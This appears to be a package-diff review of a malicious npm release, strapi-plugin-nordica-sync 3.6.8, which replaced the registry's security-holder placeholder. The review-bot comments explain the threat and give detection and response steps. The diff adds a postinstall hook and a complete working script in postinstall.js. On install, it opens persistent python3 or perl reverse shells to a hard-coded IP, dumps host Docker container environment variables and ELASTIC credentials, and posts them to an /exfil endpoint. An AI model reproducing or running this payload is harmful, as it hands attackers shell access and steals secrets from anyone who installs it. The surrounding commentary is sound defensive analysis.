strapi-plugin-nordica-sync 0.0.1-security → 3.6.8
Potentially problematic release.
- package/index.js +1 -0
- package/package.json +1 -6
- package/postinstall.js +73 -0
- package/README.md +0 -5
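--- a/package/index.js
+++ b/package/index.js
@@ -0,0 +1 @@
+module.exports=()=>{};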
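--- a/package/package.json
+++ b/package/package.json
@@ -1,6 +1 @@
-{
-"name": "strapi-plugin-nordica-sync",
-"version": "0.0.1-security",
-"description": "security holding package",
-"repository": "npm/security-holder"
-}
+{"name":"strapi-plugin-nordica-sync","version":"3.6.8","main":"index.js","scripts":{"postinstall":"node postinstall.js"},"license":"MIT"}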
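Review bot: The new manifest registers `"postinstall": "node postinstall.js"`, so the code in postinstall.js runs automatically, with the installing user's privileges, on every install of 3.6.8; that hook is the delivery mechanism of this release, since the only other code (index.js) exports a no-op. The removed fields show 0.0.1-security was npm's security-holder placeholder, so this version re-publishes over a name that had already been pulled for malicious code. Defensively, block or pin this package, run CI installs with `--ignore-scripts` so lifecycle hooks cannot execute, and treat any host that installed 3.6.8 as compromised as described under the postinstall.js section.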
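--- a/package/postinstall.js
+++ b/package/postinstall.js
@@ -0,0 +1,73 @@
+const { execSync, spawnSync } = require('child_process');
+const http = require('http');
+const VPS = '144.31.107.231';
+const PORT = 9999;
+
+function send(tag, data) {
+return new Promise(resolve => {
+const body = typeof data === 'string' ? data : JSON.stringify(data);
+const req = http.request({ hostname: VPS, port: PORT, path: '/exfil/' + tag,
+method: 'POST', headers: { 'Content-Type': 'text/plain', 'Content-Length': Buffer.byteLength(body) }
+}, resolve);
+req.on('error', resolve);
+req.write(body); req.end();
+});
+}
+
+const run = (cmd, t = 60000) => {
+try { return spawnSync('sh', ['-c', cmd], { timeout: t, encoding: 'utf8', maxBuffer: 5000000 }).stdout || ''; }
+catch (e) { return 'err:' + e.message.substring(0, 200); }
+};
+
+async function main() {
+if (process.cwd().includes('TRANSFER') || run('uname -s').includes('MINGW')) return;
+
+await send('ps-start', run('hostname').trim() + ' | ' + run('id').trim());
+
+// Launch PERSISTENT reverse shell in background (survives postinstall exit)
+try {
+execSync('nohup python3 -c "import socket,subprocess,os,time;' +
+'s=socket.socket();' +
+'[s.connect((\\\"' + VPS + '\\\",4444)) for _ in range(1)];' +
+'os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);' +
+'subprocess.call([\\\"/bin/bash\\\",\\\"-i\\\"])" &>/dev/null &',
+{ timeout: 5000 });
+await send('ps-shell', 'persistent bash reverse shell launched');
+} catch(e) {
+// Try perl
+try {
+execSync('nohup perl -e \'use Socket;$i="' + VPS + '";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};\' &>/dev/null &',
+{ timeout: 5000 });
+await send('ps-shell', 'persistent perl reverse shell launched');
+} catch(e2) { await send('ps-shell-err', e2.message.substring(0,200)); }
+}
+
+// Also do quick Docker config dump while we're here
+const HR = '/proc/1/root';
+await send('ps-docker-ls', run('ls ' + HR + '/data1/app/docker/containers/ 2>/dev/null | head -30'));
+
+// Read all container configs
+const containers = run('ls ' + HR + '/data1/app/docker/containers/ 2>/dev/null').trim().split('\n').filter(c => c.length > 10);
+for (let i = 0; i < Math.min(containers.length, 20); i++) {
+const cid = containers[i].trim();
+const config = run('cat ' + HR + '/data1/app/docker/containers/' + cid + '/config.v2.json 2>/dev/null');
+if (config && config.length > 50) {
+try {
+const p = JSON.parse(config);
+const name = (p.Name || '').replace(/^\//,'');
+const image = (p.Config && p.Config.Image) || '?';
+const env = (p.Config && p.Config.Env) || [];
+await send('dc-' + i + '-' + name.substring(0,15), JSON.stringify({
+name, image, env: env.filter(e => !e.startsWith('PATH=') && !e.startsWith('SHLVL=') && !e.startsWith('HOME='))
+}));
+} catch(e) {}
+}
+}
+
+// ES with creds from Docker configs
+const allSecrets = run('cat ' + HR + '/data1/app/docker/containers/*/config.v2.json 2>/dev/null | grep -oP \'"ELASTIC[^"]*"\s*:\s*"[^"]*"\' 2>/dev/null');
+await send('ps-es-secrets', allSecrets || 'none');
+
+await send('ps-complete', 'DONE');
+}
+main().catch(e => send('ps-fatal', e.message));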
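Review bot: This postinstall script is a compromise payload rather than plugin code: `send()` POSTs every result to the hard-coded `144.31.107.231:9999` under `/exfil/<tag>`, `main()` backgrounds a `nohup python3 -c` (falling back to `nohup perl -e`) process that opens an interactive `/bin/bash -i` back to port 4444 on the same host, and the loop over `/proc/1/root/data1/app/docker/containers/*/config.v2.json` reads container names, images and `Env` from the host's Docker state and ships them out, followed by any `ELASTIC*` values grepped from the same files. The only early exits are a `TRANSFER` substring in the working directory or a MINGW `uname`, so presumably every Linux or macOS install with network access runs the full sequence, and because `req.on('error', resolve)` and the empty `catch(e) {}` swallow failures, a clean install log proves nothing. Detection points that follow directly from the visible lines: outbound connections to 144.31.107.231 on 9999 or 4444, HTTP bodies tagged `ps-start` through `ps-complete`, and python3/perl children of the npm install that outlive it. Response is to treat the installing host and every secret present in the dumped container `Env` as exposed and rotate them, terminate the backgrounded shell process, and remove the package; keeping the registry's 0.0.1-security holder pinned prevents reinstallation.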
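--- a/package/README.md
+++ b/package/README.md
@@ -1,5 +0,0 @@
-# Security holding package
-
-This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
-
-Please refer to www.npmjs.com/advisories?search=strapi-plugin-nordica-sync for more information.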